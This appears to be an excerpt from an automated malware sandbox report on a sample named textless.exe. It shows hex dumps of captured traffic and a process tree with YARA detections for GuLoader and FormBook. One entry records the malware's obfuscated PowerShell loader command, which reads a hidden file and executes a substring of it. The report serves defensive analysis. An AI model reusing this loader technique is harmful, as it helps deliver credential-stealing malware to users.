                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 83 61 b9 90 d6 e9 8b e5 a1 74 10 16 e5 96 52 be 3e ed 7d e3 29 f4 20 1d 8f db fd 90 11 9c 30 6d 83 f9 a9 d2 12 5a 7e 94 34 86 bd 4a 09 e4 8b 0a 78 8a d7 da 8a e4 dc 2c 6c c7 1d e4 3f e8 6d 6c e7 62 36 55 49 dd 17 e0 0e 96 04 7c 1a bf b6 30 a4 ae 2d 45 95 10 96 13 4d b1 75 67 cb 93 ce 4d 31 d7 f3 1c 5f 15 84 69 1c 98 ef 2a 79 0e 5d 62 cd fc ce 6c f2 00 08 91 a0 47 68 db 8a a7 af 24 84 88 61 b4 d1 74 7a 5b 03 22 d1 bb de f6 00 f4 f5 10 a9 67 8d 7b d1 07 7d 53 75 1c 81 f3 ff d5 53 ba 34 b7 d5 4a c2 05 94 59 a8 c4 af f5 dc 1a f0 b0 23 f4 43 52 6c 5f a1 a7 84 1f e7 fd 45 09 8c e8 12 52 8e 64 5b 3b b7 64 64 b0 00 69 38 0f 07 16 81 df df cd 25 b8 0c 89 1d f1 aa 91 0f ef 59 4a 0a d6 99 be f7 3f 83 d7 06 1d 48 95 ba a5 89 d4 66 02 df 03 7d b1 ea 7d 33 1e ac 03 ac
                                                                                            Data Ascii: atR>}) 0mZ~4Jx,l?mlb6UI|0-EMugM1_i*y]blGh$atz["g{}SuS4JY#CRl_ERd[;ddi8%YJ?Hf}}3
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: eb 3c 4f 92 6e 3c b8 b7 ca eb eb 0f 4b f9 35 e5 fa e0 ef 92 8b 09 01 83 71 f5 b6 fd 68 8e 48 ef 82 17 b8 ce a5 af c1 55 cf 53 c0 3f 37 c6 c7 e5 0d 6d 10 24 bf 0a 50 13 db 83 c7 88 09 15 b4 af 2b cb 5b 28 44 48 c0 05 00 b3 be c1 b5 2b 24 c9 80 51 87 4e e8 64 7a b7 0b 6b a9 33 f0 78 46 33 d2 77 a9 7f 2b 4f 97 b9 ef 44 ce 8e 23 ad 87 2a aa 36 99 04 29 4f c8 20 06 55 1e 2b 97 80 10 a7 1e d7 df a0 5e b6 3a 74 1e c6 92 31 b7 9b 57 71 2b cd 96 6f 6d 5c 04 79 21 d4 71 96 5e b3 2b ed 74 4f 6c 75 fe d9 24 18 10 25 17 87 36 c8 b5 05 ab c8 4d 13 64 97 24 6f 02 c4 4c b4 05 8e 60 58 74 81 e7 32 45 74 8f e1 a9 d1 01 fa d3 74 82 25 69 21 b7 ee 0d 09 78 ac 62 a6 53 a6 0c 14 90 c6 ee ab c9 8d f3 dc 2c 81 e2 15 f0 af a6 82 f0 2a 33 19 41 3d de 19 3c 0f 47 07 56 c7 18 7b 82
                                                                                            Data Ascii: <On<K5qhHUS?7m$P+[(DH+$QNdzk3xF3w+OD#*6)O U+^:t1Wq+om\y!q^+tOlu$%6Md$oL`Xt2Ett%i!xbS,*3A=<GV{
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 60 9a 27 a0 8d be 93 22 51 9b 0e e3 9e 2d 11 2c 66 35 db de 38 56 04 61 41 ca 95 a9 17 50 56 af d5 34 91 32 9c 90 f9 f5 3e b4 7c c9 bf 12 a1 cc ad 3b 19 4b 40 e7 4b 7a 8c ed c6 02 56 d1 ec 60 02 11 f3 75 2c 40 ac 41 2d f0 5d 84 97 2e 84 ff c2 a2 1f f4 48 8e 0b b0 9c 76 91 7d 47 87 3c 92 1c 4f 73 96 f4 0f 07 da 01 77 b3 85 d8 4a df db e2 03 34 38 c7 7b 2a e2 fb 57 8f 92 3c b3 47 c1 41 34 e4 5d c9 f2 f9 c5 ea e8 77 e6 3d af aa 47 06 24 68 11 e2 c6 dd ed 88 5b dd 0a e8 85 9f 0d 4d 29 ec 2a 5c dd c8 d3 d5 f0 90 df 7c 1e a8 88 5d 40 c9 8b 7b ba bf 20 ef 4e f9 ef 09 f1 8c c1 2b 95 7c b2 dd bb ba 92 61 b0 ac df 24 93 5c 92 bd 71 b0 15 06 ac 96 d9 aa 44 31 b3 6f d6 89 06 aa 6c 42 d9 ba ba 5a c6 94 48 7c 9b 85 3f 3a 06 84 55 fb 78 a7 cc 66 7c 7e 2a 1e 4f 0b 17 58
                                                                                            Data Ascii: `'"Q-,f58VaAPV42>|;K@KzV`u,@A-].Hv}G<OswJ48{*W<GA4]w=G$h[M)*\|]@{ N+|a$\qD1olBZH|?:Uxf|~*OX
                                                                                            2025-03-10 10:24:35 UTC1342INData Raw: 64 12 f3 95 cc 7c 44 85 16 1c 41 4a ac a7 c6 14 b4 5e 33 ed 1c be df 63 ed 73 2a 25 24 20 02 35 9a 2d 70 bf 5e 27 a1 cd fa 63 86 36 42 fd 39 67 a5 04 90 58 f8 e6 07 0b 5b 55 46 f6 6e aa 83 c7 99 6f 9b cc 79 4e 56 b4 23 21 20 e7 08 43 78 ff 42 ae 66 4e 36 1c 39 f4 6b 54 7a 75 98 9b 39 b1 43 cd 97 05 40 b1 83 ca ac 4f 38 5d b8 c1 ad 89 88 82 aa 4d 1c 54 d2 fe a6 c7 7b 9e 29 9b 50 d7 c3 0e 16 63 e5 52 3e 49 be ef 07 53 36 98 42 17 d7 4a 6b e6 45 af 6b 67 bc a2 9a 1c 6e b0 eb c6 9f 0e 0c 98 ba 0d e3 64 39 e1 9b a7 1c e7 1d f0 e2 1c 6f d4 83 ac 16 d8 f6 27 25 74 c7 07 08 39 1d 93 42 62 de b3 21 d9 cc c1 18 9e 4f f0 26 a2 25 cd 04 f1 f4 5a c0 42 47 62 f1 22 4b c4 ff 84 99 20 8c 22 50 a3 1f 4b fb 23 f1 0d 5b ad f4 07 d8 c6 e9 d9 e9 ce 13 83 28 f4 ca 58 0b f7 80
                                                                                            Data Ascii: d|DAJ^3cs*%$ 5-p^'c6B9gX[UFnoyNV#! CxBfN69kTzu9C@O8]MT{)PcR>IS6BJkEkgnd9o'%t9Bb!O&%ZBGb"K "PK#[(X


Target ID: 0
Start time: 06:23:19
Start date: 10/03/2025
Path: C:\Users\user\Desktop\textless.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\textless.exe"
Imagebase: 0x400000
File size: 621'676 bytes
MD5 hash: 9E8270179F04D867463A09AF7EE36E32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 06:23:19
Start date: 10/03/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"
Imagebase: 0xdc0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1507106973.0000000009D53000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

                                                                                            Target ID:2
                                                                                            Start time:06:23:19
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff642da0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:06:23:51
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7c8b00000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:11
                                                                                            Start time:06:24:20
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Users\user\AppData\Local\Temp\Versificator.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\Versificator.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:621'676 bytes
                                                                                            MD5 hash:9E8270179F04D867463A09AF7EE36E32
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 24%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:06:25:04
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\ZLQzzyNy0.exe"
                                                                                            Imagebase:0x300000
                                                                                            File size:143'872 bytes
                                                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:15
                                                                                            Start time:06:25:05
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Windows\SysWOW64\logman.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\logman.exe"
                                                                                            Imagebase:0xd0000
                                                                                            File size:98'816 bytes
                                                                                            MD5 hash:AE108F4DAAB2DD68470AC41F91A7A4E9
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:16
                                                                                            Start time:06:25:18
                                                                                            Start date:10/03/2025
                                                                                            Path:C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\o7geodUa.exe"
                                                                                            Imagebase:0x300000
                                                                                            File size:143'872 bytes
                                                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false
